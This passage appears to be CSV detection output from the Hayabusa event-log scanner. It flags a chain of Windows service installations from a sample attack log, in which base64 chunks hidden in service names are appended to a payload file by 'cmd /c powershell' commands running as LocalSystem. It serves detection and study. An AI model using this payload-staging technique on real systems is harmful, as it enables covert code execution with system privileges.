ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:51.086 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:57.001 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:05.712 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | 